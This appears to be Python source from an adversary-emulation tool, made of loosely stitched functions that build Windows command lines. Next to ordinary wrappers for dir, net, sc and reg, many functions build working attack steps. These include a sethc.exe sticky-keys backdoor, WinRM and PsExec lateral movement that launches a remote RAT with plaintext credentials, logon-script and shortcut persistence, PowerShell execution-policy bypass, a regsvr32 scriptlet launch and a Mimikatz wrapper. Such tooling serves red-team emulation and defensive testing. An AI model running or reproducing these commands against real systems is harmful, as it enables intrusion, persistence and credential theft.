def accessFeatA(key_id: int) -> Tuple [CommandLine, Callable[[str], None]]:
    """Build the cmd.exe command that replaces the accessibility binary sethc.exe with a copy of cmd.exe.

    The chained command takes ownership of C:\\Windows\\System32\\sethc.exe,
    grants the administrators group full control, renames the original to
    ``sethc.exe.<key_id>`` and then copies cmd.exe into its place.

    Args:
        key_id: Numeric suffix appended to the renamed original sethc.exe.

    Returns:
        The CommandLine and the static accessFeat parser for the output of the command.
    """
    # Backslashes are doubled for Python; the outer \" pair quotes the whole
    # chained command for cmd.exe /C.
    command_line = "cmd.exe /C \"takeown /f C:\\Windows\\System32\\sethc.exe && icacls " \
                   "C:\\Windows\\System32\\sethc.exe /grant administrators:f " \
                   "&& move C:\\Windows\\System32\\sethc.exe " \
                   "C:\\Windows\\System32\\sethc.exe." + str(key_id) + " && copy C:\\Windows\\System32\\cmd.exe " \
                   "C:\\Windows\\System32\\sethc.exe\""
    return CommandLine(command_line), parsers.static.accessFeat
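def dir_list(search: Union[str, list], b: bool, s: bool, a: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the cmd.exe ``dir`` command that lists the files/folders in a directory.

    Args:
        search: Either a single full path (str), which is wrapped in double
            quotes, or a list of terms each wrapped in ``*`` wildcards and
            matched within the current working directory.
        b: Include the ``/b`` switch (bare output, just file names).
        s: Include the ``/s`` switch (recurse into subdirectories).
        a: Attribute filter appended directly to ``/a`` when not None.

    Returns:
        The CommandLine and a parser for the output of the command.

    Raises:
        errors.ParserNotImplementedError: when ``b`` and ``s`` are not both
            set, because only the ``/b /s`` output format has a parser.
    """
    args = ["cmd /c dir"]
    if isinstance(search, str):
        # dir "C:\full\path"
        args.append('"' + search + '"')
    else:
        # dir *term1* *term2* — iterate the supplied terms (the original
        # iterated the builtin ``list`` type here, which raised TypeError).
        args.extend("*" + word + "*" for word in search)
    if b:
        args.append('/b')
    if s:
        args.append('/s')
    if a is not None:
        args.append('/a' + a)
    # The output of these switches differs radically, so each combination
    # needs its own parser; only /b /s has one so far.
    if b and s:
        return CommandLine(args), parsers.cmd.dir_collect
    raise errors.ParserNotImplementedError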
def __init__(self, function_name: str, *args: PSArg) -> None:
    """Assemble the command line from a function name followed by each argument's ``text``."""
    tokens = [function_name]
    tokens.extend(arg.text for arg in args)
    self.command = CommandLine(tokens)
def files() -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the PowerShell command that rewrites .docx/.pdf/.xlsx files under c:\\Users from their ``.old`` copies.

    For every matching file found recursively, the bytes of ``<file>.old`` are
    copied over the leading bytes of the file, the result is written back with
    WriteAllBytes, and the ``.old`` copy is removed.

    Returns:
        The CommandLine (wrapped in ``cmd /c``) and the footprint recover_files parser.
    """
    # Quotes are escaped twice because the PowerShell script is embedded in a
    # cmd.exe command line; keep the literal byte-for-byte.
    command = 'powershell -command "&{$filetype = @(\\"*.docx\\",\\"*.pdf\\",\\"*.xlsx\\"); $startdir = ' \
              '\\"c:\\\\Users\\\\\\"; for($k=0;$k -lt $filetype.length; $k++){ $core = dir $startdir\($filetype[$k]) ' \
              '-Recurse | Select @{Name=\\"Path\\";Expression={$_.Fullname -as [string]}}; foreach ($alpha in $core) ' \
              '{$filename = $alpha.Path -as [string]; [Byte[]] $corrupt_file = [System.IO.File]::ReadAllBytes(' \
              '$filename); [Byte[]] $key_file = [System.IO.File]::ReadAllBytes($(' \
              '-join($filename, \\".old\\"))); for($i=0; $i -lt $key_file.Length; $i++) { $corrupt_file[$i] = ' \
              '$key_file[$i];} [System.IO.File]::WriteAllBytes($(resolve-path $filename), $corrupt_file); ' \
              'Remove-Item $(-join($filename,\\".old\\"))}}}"'
    return CommandLine(
        'cmd /c {}'.format(command)), parsers.footprint.recover_files
def delete(path: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the cmd.exe ``del`` command for a single file.

    Args:
        path: Path of the file to delete; it is wrapped in double quotes.

    Returns:
        The CommandLine and the parser for ``del`` output.
    """
    quoted_path = '"{}"'.format(path)
    return CommandLine(['cmd /c del', quoted_path]), parsers.cmd.delete
def runas(user: str, program: str, args: List[str] = None) -> CommandLine:
    """Build a command line for runas.exe.

    NOTE(review): ``user`` and ``program`` are accepted but never placed on
    the command line; only ``args`` is appended after ``runas.exe``, so any
    user/program switches have to arrive via ``args``.

    Args:
        user: Currently unused.
        program: Currently unused.
        args: Additional command line arguments to runas.exe; ignored when empty or None.

    Returns:
        The CommandLine
    """
    command_line = ['runas.exe', *args] if args else ['runas.exe']
    return CommandLine(command_line)
def copy(src_file_path: str, dst_file_path: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the cmd.exe ``copy`` command.

    Args:
        src_file_path: Source path; wrapped in double quotes.
        dst_file_path: Destination path; wrapped in double quotes.

    Returns:
        The CommandLine and the parser for ``copy`` output.
    """
    command = 'cmd /c copy "{src}" "{dst}"'.format(src=src_file_path, dst=dst_file_path)
    return CommandLine(command), parsers.cmd.copy
def wmic(args: List[str]=None) -> CommandLine:
    """Build a command line for the Windows tool wmic.exe.

    Args:
        args: Additional arguments appended after ``wmic``; skipped when None
            (an empty list is appended as nothing).

    Returns:
        The CommandLine
    """
    extra = [] if args is None else list(args)
    return CommandLine(["wmic"] + extra)
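def xcopy(args: List[str], overwrite_destination: bool) -> CommandLine:
    """Copies files and directories, including subdirectories.

    Ref: https://technet.microsoft.com/en-us/library/bb491035.aspx

    Args:
        args: Command line arguments passed through to the CommandLine as
            given; the caller's list is copied, not mutated.
        overwrite_destination: True appends ``/y`` so an existing destination
            is overwritten without prompting.

    Returns:
        The CommandLine
    """
    # Copy first: the original appended '/y' to the caller's own list, so a
    # reused argument list accumulated a duplicate '/y' on every call.
    command_line = list(args)
    if overwrite_destination:
        command_line.append('/y')
    return CommandLine(command_line)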
def tasklist(args: List[str]=None) -> CommandLine:
    """Build a command line for the Windows ``tasklist`` command.

    Args:
        args: Additional command line arguments; ignored when empty or None.

    Returns:
        The CommandLine
    """
    command_line = ['tasklist', *args] if args else ['tasklist']
    return CommandLine(command_line)
def net(args: List[str]=None) -> CommandLine:
    """Build a command line for net.exe, one of Windows' many swiss army knives.

    Args:
        args: Additional command line arguments to net.exe; ignored when empty or None.

    Returns:
        The CommandLine
    """
    extra = list(args) if args else []
    return CommandLine(['net'] + extra)
def powershell(
        command: str,
        parser=parsers.cmd.powershell_file
) -> Tuple[CommandLine, Callable[[str], None]]:
    """Run a PowerShell command through the Windows command prompt.

    Args:
        command: The PowerShell command to run. Remember that multiple
            PowerShell commands can be separated with ``;``.
        parser: Parser applied to the command output; defaults to the
            powershell_file parser (the default is resolved once at import time).

    Returns:
        The CommandLine and a parser for the output of the command
    """
    ps_command = "powershell -ExecutionPolicy Bypass -WindowStyle Minimized -Command " + command
    # NOTE(review): the format string ends in two double quotes, so the
    # emitted line closes with `""`; confirm that is the intended quoting for
    # cmd /c rather than a stray character (compare shutdown()/move(), which
    # use a single 'cmd /c {}' form).
    return CommandLine('cmd /c \"{}\""'.format(ps_command)), parser
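def at(remote_host: str = None, args: List[str] = None) -> CommandLine:
    """Build a command line for the Windows ``at`` scheduler command.

    Args:
        remote_host: Optional host; when given, ``'\\' + remote_host`` is
            added as the last argument (after ``args``), matching the
            original argument order.
        args: Additional command line arguments to at.exe; the caller's list
            is not modified.

    Returns:
        The CommandLine
    """
    command_line = ['at']
    # Work on a copy: the original did args.append(...) directly, which
    # raised AttributeError when remote_host was given without args and
    # mutated the caller's list otherwise.
    extra = list(args) if args else []
    if remote_host:
        # NOTE(review): sc() and reg() in this file build the host token with
        # a doubled backslash ('\\\\'); this one emits a single backslash —
        # confirm which form is intended.
        extra.append('\\' + remote_host)
    command_line += extra
    return CommandLine(command_line)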
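def makecab(path: str = None, args: List[str] = None) -> CommandLine:
    """Build the ``makecab`` command line that creates a cabinet file.

    Args:
        path: Path passed to makecab as its first argument; omitted when None.
        args: Additional command line arguments to makecab.exe.

    Returns:
        The CommandLine
    """
    command_line = ['makecab']
    # The original did ``command_line += " " + path``, which extended the
    # list with one element per character (and raised TypeError for None).
    if path is not None:
        command_line.append(path)
    if args:
        command_line += args
    return CommandLine(command_line)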
def sc(args: List[str] = None, remote_host: str = None) -> CommandLine:
    """Build a command line for the Windows tool sc.exe.

    Args:
        args: The additional arguments for the command line; ignored when None.
        remote_host: Optional host; when given, ``\\\\<remote_host>`` is placed
            directly after ``sc.exe`` (run on a remote host via RPC).

    Returns:
        The CommandLine
    """
    host_part = [] if remote_host is None else ['\\\\' + remote_host]
    arg_part = [] if args is None else list(args)
    return CommandLine(["sc.exe"] + host_part + arg_part)
def shutdown(reboot: bool, delay: int, force: bool) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the ``shutdown`` command for the current computer, optionally as a reboot.

    Args:
        reboot: Add ``/r`` so the machine restarts instead of powering off.
        delay: Seconds passed to ``/t`` before the shutdown starts.
        force: Add ``/f`` to close open programs without prompting the user.

    Returns:
        The CommandLine (wrapped in ``cmd /c``) and the shutdown parser.
    """
    switches = ['shutdown', '/t', str(delay)]
    switches += ['/r'] if reboot else []
    switches += ['/f'] if force else []
    return CommandLine('cmd /c {}'.format(' '.join(switches))), parsers.shutdown.shutdown
def move(
        src_file_path: str,
        dst_file_path: str,
        suppress_overwrite: bool) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the cmd.exe ``move`` command.

    Args:
        src_file_path: Path of the file to move; wrapped in double quotes.
        dst_file_path: Destination path; wrapped in double quotes.
        suppress_overwrite: Add ``/Y`` so an existing destination is
            replaced without a confirmation prompt.

    Returns:
        The CommandLine and the parser for ``move`` output.
    """
    verb = 'move /Y' if suppress_overwrite else 'move'
    command = 'cmd /c {} "{}" "{}"'.format(verb, src_file_path, dst_file_path)
    return CommandLine(command), parsers.cmd.move
def lateral_movement(
        ip: str,
        password: str,
        domain: str,
        user: str,
        file_loc: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build a PowerShell remoting command line that starts ``file_loc`` on ``ip``.

    The command adds ``ip`` to the local WSMan TrustedHosts list, builds a
    PSCredential from ``domain\\user`` and ``password``, and runs
    ``invoke-command`` against ``ip`` with a base64 (UTF-16LE) encoded
    ``Invoke-WmiMethod ... create`` call for ``file_loc``.

    Args:
        ip: Remote host to connect to.
        password: Account password; it is placed verbatim on the command line.
        domain: Domain of the account.
        user: User name of the account.
        file_loc: Path of the executable to start on the remote host.

    Returns:
        The CommandLine and the winrm lateral_movement parser.
    """
    # -EncodedCommand expects the script as base64 over UTF-16LE bytes.
    com = base64.b64encode(
        bytes(
            "Invoke-WmiMethod -path win32_process -name create -argumentlist '" + file_loc + "'",
            'UTF-16LE')).decode("UTF-8")
    command_line = [
        'powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive', '-NoProfile', '-Command',
        '"Set-Item WSMan:localhost\\client\\trustedhosts -value ' + ip + '-Concatenate -Force;',
        '$pw = convertto-securestring -AsPlainText -Force -String ' + password + ';',
        '$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist ' + domain + "\\" + user + ',$pw;',
        'invoke-command -computerName ' + ip + ' -credential $cred '
        '-scriptblock {' + 'powershell.exe -ExecutionPolicy Bypass -EncodedCommand ' + com + ' }"'
    ]
    return CommandLine(command_line), parsers.winrm.lateral_movement
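def reg(remote_host: str = None, args: List[str] = None) -> CommandLine:
    """Build a command line for ``reg``, which queries and modifies the Windows registry.

    Args:
        remote_host: Host that is the target of the reg operation; when
            given, ``\\\\<remote_host>`` is added as a single argument after ``reg``.
        args: Additional command line arguments to reg.exe

    Returns:
        The CommandLine
    """
    command_line = ['reg']
    if remote_host is not None:
        # append(), not +=: the original ``+=`` with a str spread the host
        # token into the list one character at a time.
        command_line.append("\\\\{}".format(remote_host))
    if args:
        command_line += args
    return CommandLine(command_line)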
def copy(ps_file_path: str, rat_file_path: str, user_domain: str, username: str, password: str, target: str,
         elevated: bool = True) -> Tuple[CommandLine, Callable[[str], None]]:
    """Builds a commandline for PsExec to copy and execute a file remotely

    Args:
        ps_file_path: The path to the psexec binary
        rat_file_path: The path to the file that is copied to and run on the remote computer
        user_domain: The (Windows) domain of the user account
        username: The username for the remote share
        password: The password to be used
        target: The target host to run the file on
        elevated: Allows the created process to be run in an elevated context (adds ``-h``)

    Returns:
        The CommandLine and a parser
    """
    # NOTE(review): when elevated is False an empty string stays in the
    # argument list where "-h" would be; confirm CommandLine drops empty tokens.
    args = [ps_file_path, "-accepteula", "-u", user_domain + "\\" + username, "-p", password,
            "-h" if elevated else '', "-d", "-cv", rat_file_path, "\\\\" + target]
    return CommandLine(args), parsers.psexec.copy
def bypassB() -> Tuple [CommandLine, Callable[[str], None]]:
    """Build the command line that runs the script C:\\bypassB.ps1 with the execution policy set to Bypass.

    Returns:
        The CommandLine and the static bypassB parser.
    """
    script_path = "C:\\bypassB.ps1"
    return CommandLine(['powershell', '-executionPolicy', 'Bypass', '-file', script_path]), parsers.static.bypassB
def netstat(args: List[str] = None) -> CommandLine:
    """Build a command line for ``netstat``.

    Args:
        args: Additional command line arguments; ignored when empty or None.

    Returns:
        The CommandLine
    """
    return CommandLine(['netstat'] + (list(args) if args else []))
def regsvr32() -> Tuple[CommandLine, Callable[[str], None]]:
    """Build a fixed ``regsvr32`` command line paired with the test regsvr32 parser.

    Returns:
        The CommandLine and the test regsvr32 parser.
    """
    # NOTE(review): the switches and both operands are one list element; if
    # CommandLine quotes each element they form a single token — confirm.
    command_line = ['regsvr32', '/s /u /i:C://Example.sct scrobj.dll']
    return CommandLine(command_line), parsers.test.regsvr32
def logonScriptB() -> Tuple [CommandLine, Callable[[str], None]]:
    """Build the ``reg add`` command that sets HKCU\\Environment\\UserInitMprLogonScript.

    The value is written as REG_SZ pointing at C:\\totally_innocent_executable.exe;
    ``/f`` overwrites an existing value without prompting.

    Returns:
        The CommandLine and the static logonScript parser.
    """
    command_line = ['reg', 'add', 'HKCU\\Environment', '/v', 'UserInitMprLogonScript', '/t', 'REG_SZ', '/d', 'C:\\totally_innocent_executable.exe', '/f']
    return CommandLine(command_line), parsers.static.logonScript
def shortcutmodify(target_path: str, rat_path: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the PowerShell command that writes the shortcut at ``target_path`` so it points at ``rat_path``.

    Uses the WScript.Shell COM object: CreateShortcut on ``$SHORTCUT``, sets
    TargetPath to ``$TARGET`` and saves.

    Args:
        target_path: Path of the shortcut file (assigned to ``$SHORTCUT``).
        rat_path: Target the shortcut will point at (assigned to ``$TARGET``).

    Returns:
        The CommandLine and the static shortcutmodify parser.
    """
    command_line = ['powershell', '-ExecutionPolicy Bypass', '-NoLogo', '-NonInteractive', '-NoProfile', '-Command',
                    '"$SHORTCUT=\'' + target_path + '\';$TARGET=\'' + rat_path + '\';$ws = New-Object -ComObject ' +
                    'WScript.Shell; $s = $ws.CreateShortcut($SHORTCUT); $S.TargetPath = $TARGET; $S.Save()"']
    return CommandLine(command_line), parsers.static.shortcutmodify
def cleanupCMD(CleanCmd: str) -> Tuple [CommandLine, Callable[[str], None]]:
    """Wrap a caller-supplied cleanup command string as a single-element CommandLine.

    Args:
        CleanCmd: The complete command to run.

    Returns:
        The CommandLine and the static cleanup parser.
    """
    return CommandLine([CleanCmd]), parsers.static.cleanup
def password(user: str, password: str) -> Tuple[CommandLine, Callable[[str], None]]:
    """Build the ``net user`` command that sets ``user``'s password to ``password``.

    Args:
        user: Account name.
        password: New password; placed verbatim on the command line.

    Returns:
        The CommandLine (wrapped in ``cmd /c``) and the footprint password parser.
    """
    net_user = 'net user {} {}'.format(user, password)
    return CommandLine('cmd /c {}'.format(net_user)), parsers.footprint.password
def logonScriptA() -> Tuple [CommandLine, Callable[[str], None]]:
    """Build the ``reg export`` command that saves HKCU\\Environment to C:\\envn.reg.

    Returns:
        The CommandLine and the static logonScript parser.
    """
    export_target = 'C:\\envn.reg'
    return CommandLine(['reg', 'export', 'HKCU\\Environment', export_target]), parsers.static.logonScript
def __init__(self, *args: MimikatzSubcommand) -> None:
    """Build the command line from the ``text`` of each subcommand, in order.

    If the first subcommand's text contains a backslash, ``cls`` is prepended
    as the first token.

    Args:
        *args: Subcommands; at least one is required, since ``args[0]`` is
            read unconditionally (an empty call raises IndexError).
    """
    if '\\' in args[0].text:
        self.command = CommandLine(['cls'] + [x.text for x in args])
    else:
        self.command = CommandLine([x.text for x in args])